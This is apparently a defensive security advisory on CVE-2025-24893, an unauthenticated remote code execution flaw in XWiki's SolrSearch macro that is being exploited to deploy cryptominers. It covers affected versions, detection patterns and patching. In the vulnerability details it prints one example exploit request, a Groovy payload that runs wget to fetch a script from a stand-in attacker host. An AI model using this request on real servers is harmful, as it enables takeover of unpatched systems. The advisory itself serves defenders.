Executive Summary

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added a critical vulnerability in the XWiki enterprise wiki platform, tracked as CVE-2025-24893, to its Known Exploited Vulnerabilities (KEV) catalog. This action follows confirmation of active, in-the-wild exploitation. The flaw is an unauthenticated remote code execution (RCE) vulnerability with a CVSS score of 9.8, allowing attackers to take complete control of vulnerable servers. Observed attacks are leveraging this access to deploy cryptocurrency mining malware. CISA has directed Federal Civilian Executive Branch (FCEB) agencies to apply mitigations, and all organizations using affected XWiki versions are urged to patch immediately.

Vulnerability Details

The vulnerability, CVE-2025-24893, is a severe eval injection flaw. It exists in how the SolrSearch macro in XWiki processes search queries. The macro fails to properly sanitize user-supplied input containing Groovy expressions. An unauthenticated attacker can craft a simple GET request with a malicious search query containing Groovy code. When the XWiki server processes this query, it executes the embedded code with the full permissions of the XWiki application's user account.

An example of a malicious query might look like this:

/xwiki/bin/view/Main/SolrSearch?q=~"{{groovy}}new%20ProcessBuilder(\"wget\",\"http://attacker.com/payload.sh\").start(){{/groovy}}"~&sort=score&sort_order=desc

This simplicity and lack of an authentication requirement make any internet-facing, unpatched XWiki instance an easy target.

Affected Systems

The vulnerability affects the following versions of the XWiki Platform:

• Versions prior to 15.10.11
• Versions prior to 16.4.1
• Versions prior to 16.5.0RC1

Exploitation Status

CVE-2025-24893 is being actively exploited in the wild. Researchers at VulnCheck reported observing multiple exploitation attempts against their XWiki honeypot servers. The attacks were traced back to an IP address geolocated in Vietnam. The observed attack chain involves using the RCE to execute a wget command, which downloads a second-stage script. This script then fetches and executes a cryptocurrency mining payload. The addition of this CVE to the CISA KEV catalog on October 30, 2025, confirms the widespread and active threat.

Impact Assessment

Successful exploitation of CVE-2025-24893 results in unauthenticated remote code execution, giving an attacker complete control over the underlying server. While current attacks focus on cryptomining (T1496 - Resource Hijacking), the level of access gained could easily be used for more destructive purposes, including:

• Data theft of sensitive information stored in the wiki.
• Lateral movement into the broader corporate network.
• Deployment of ransomware or other malware.
• Using the compromised server as a pivot point for further attacks.

Cyber Observables for Detection

Security teams can hunt for exploitation attempts by searching for suspicious patterns in web server access logs.

• Log Pattern: Look for GET requests to /bin/view/Main/SolrSearch where the q parameter contains strings like {{groovy}}, ProcessBuilder, execute(), or other Groovy syntax.
• Process Monitoring: On XWiki servers, monitor for child processes spawned by the Java process running XWiki, especially shell commands like wget, curl, sh, or bash.
• Network Monitoring: Watch for outbound network connections from XWiki servers to unknown or suspicious IP addresses, which could indicate payload download or C2 communication.

Detection Methods

• Vulnerability Scanning: Use vulnerability scanners with up-to-date plugins to identify unpatched XWiki instances in your environment.
• Log Analysis: Implement SIEM rules to alert on the log patterns described above. This is an application of D3-NTA: Network Traffic Analysis on web logs.
• Endpoint Detection and Response (EDR): An EDR agent on the server can detect the anomalous process creation stemming from the XWiki Java process, a key part of D3-PA: Process Analysis.

Remediation Steps

Immediate patching is the most effective remediation.

1. Upgrade XWiki: Upgrade to a patched version as soon as possible:
   • XWiki 15.10.11 or later
   • XWiki 16.4.1 or later
   • XWiki 16.5.0 or later
2. Workaround (If patching is not possible): As a temporary measure, administrators can edit the xwiki.properties file and set search.solr.rawQuery to false. This will disable the feature that allows raw query processing but may impact search functionality.
3. Restrict Access: If possible, restrict access to the XWiki instance to trusted IP ranges or place it behind a VPN. This is a form of D3-NI: Network Isolation.
4. Web Application Firewall (WAF): Deploy a WAF with rules designed to block common code injection patterns, including those targeting Groovy scripting.